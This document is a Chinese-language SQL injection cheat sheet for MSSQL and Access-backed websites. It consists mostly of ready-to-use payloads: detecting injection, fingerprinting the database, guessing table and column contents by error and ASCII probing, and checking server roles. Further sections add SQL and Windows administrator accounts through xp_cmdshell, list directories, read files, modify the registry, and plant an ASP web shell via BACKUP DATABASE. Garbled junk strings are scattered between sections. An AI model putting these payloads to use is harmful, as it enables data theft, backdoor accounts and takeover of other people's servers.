1.判断是否有注入 ;and 1=1 与 ;and 1=2 （两次响应不同，说明输入被拼进了 SQL 语句）
2.初步判断是否是 mssql ;and user>0 （user 为 nvarchar，与整数比较时 mssql 抛出类型转换错误，错误信息中会带出当前数据库用户名）

3.注入参数是字符型时 'and [查询条件] and ''='

4.搜索框（LIKE 查询）未过滤参数时 'and [查询条件] and '%25'=' （%25 是 URL 编码后的 %）
u!X[xe;
5.判断数据库系统（靠系统表名区分）

;and (select count(*) from sysobjects)>0   mssql

;and (select count(*) from msysobjects)>0   access（通常对 MSysObjects 没有读取权限，会报"没有读取权限"错误，该错误本身也说明是 access）
cM.q^{d`
~@MIG
[Gy sx
6.猜表名 ;and (select Count(*) from [表名])>0

7.猜字段 ;and (select Count(字段名) from 表名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 （把 0 换成 n 做二分；top 1 不带 order by 时取到哪一行不确定，建议加 where 或 order by 固定目标行）

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
,Ix7Yg[
10.测试权限结构(mssql)
（IS_SRVROLEMEMBER / IS_MEMBER 返回 1 表示当前登录属于该角色，0 表示不属于，角色名无效时返回 NULL）

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--   （IS_MEMBER 检查的是当前数据库角色，不是服务器角色）
;x|4Tm
Js'COO
/Y|9!{.
11.添加mssql和系统的帐户（需要 sysadmin 权限；xp_cmdshell 在 2005 及以后版本默认禁用，需先用 sp_configure 开启；net user /add 会在 Windows 安全日志中留下帐户创建记录）

;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,password,username;--   （参数顺序：旧密码, 新密码, 登录名）

;exec master.dbo.sp_addsrvrolemember username,sysadmin;--   （参数顺序：登录名, 角色名）

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
nRb#M
6pxj9@X+
S!up2OseW
12.(1)遍历目录（xp_dirtree 只给路径参数时返回 subdirectory、depth 两列，正好对应 dirs 的两列）

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0   （varchar 与 int 比较触发转换错误，错误信息中带出目录名）

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0   （逐个排除已得到的目录；目录名超过 100 字符时 insert 会因截断报错，可把 varchar(100) 放大）
e
J2wK3R
b6R0za
.#lQZo6$\|
(2)遍历目录（临时表的列数要与存储过程返回的列数一致，否则 insert ... exec 报错）

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列）

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（返回 1 列）

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构（返回 2 列）

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（每行输出一条记录；需要 xp_cmdshell 已启用）
^A;v|U
b"/P
)u(`s `zd
13.mssql中的存储过程（xp_reg* 这类扩展过程一般需要 sysadmin 权限）

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   返回指定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

常用的值类型有两种：REG_SZ 表示字符型，REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   写入注册表

xp_regdeletevalue 根键,子键,值名

;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   删除某个值

;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   删除键，包括该键下所有值
dHg[0Br)r
SI4M<'fK
o%RyE]pw,
14.mssql的backup创建webshell（把含 ASP 代码的 image 列写入库，再用 backup database ... to disk 把库文件写到 web 目录；需要 backup 权限，且 SQL Server 服务帐户对目标目录有写权限）
v>;6pcp[F
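-- Drop a web shell via BACKUP DATABASE: the ASP payload is stored in an
-- image column, then the whole database is dumped to a file under the web
-- root. The backup file is mostly binary, but the ASP engine only acts on
-- the <% ... %> block embedded in it.
-- model is a system database that exists on every instance, so no CREATE
-- DATABASE right is needed; any writable database would do.
-- NOTE(review): the cmd table stays in model afterwards and is copied into
-- every database created later -- drop it when done.
use model

-- image column: payload bytes are stored without character conversion
create table cmd(str image);

-- payload placeholder: the ASP code goes between the quotes (it appears to
-- have been stripped from this page)
insert into cmd(str) values ('');

-- target path must be writable by the SQL Server service account and be
-- served by IIS as ASP
backup database model to disk='c:\l.asp';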
1vx:`2 A4
9p9:nx\
|J?KHI
15.mssql内置函数（与整数比较触发转换错误，错误信息中带出函数返回值）

;and (select @@version)>0   获得 SQL Server 版本信息（字符串中同时包含所在 Windows 的版本）

;and user_name()='dbo'   判断当前连接用户是否为当前库的 dbo（sysadmin 成员在任何库中都映射为 dbo，但 dbo 不一定就是 sa；判断 sa 应用 system_user 或第 10 节的 IS_SRVROLEMEMBER('sysadmin')）

;and (select user_name())>0   爆当前连接的数据库用户名

;and (select db_name())>0   得到当前连接的数据库
sJw#^l
CM!bD\5
=M*31>"I0
16.简洁的webshell（与第 14 节相同，只是输出路径直接指向 web 目录）
qOV
>
CZ|Vx
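-- Same BACKUP DATABASE web-shell trick, written straight into the web
-- directory. The ASP payload sits in an image column; the dumped database
-- file is mostly binary, but the ASP engine only acts on the <% ... %>
-- block embedded in it.
-- model is a system database that exists on every instance, so no CREATE
-- DATABASE right is needed; any writable database would do.
-- NOTE(review): the cmd table stays in model afterwards and is copied into
-- every database created later -- drop it when done.
use model

-- image column: payload bytes are stored without character conversion
create table cmd(str image);

-- payload placeholder: the ASP code goes between the quotes (it appears to
-- have been stripped from this page)
insert into cmd(str) values ('');

-- target path must be writable by the SQL Server service account and be
-- served by IIS as ASP
backup database model to disk='g:\wwwtest\l.asp';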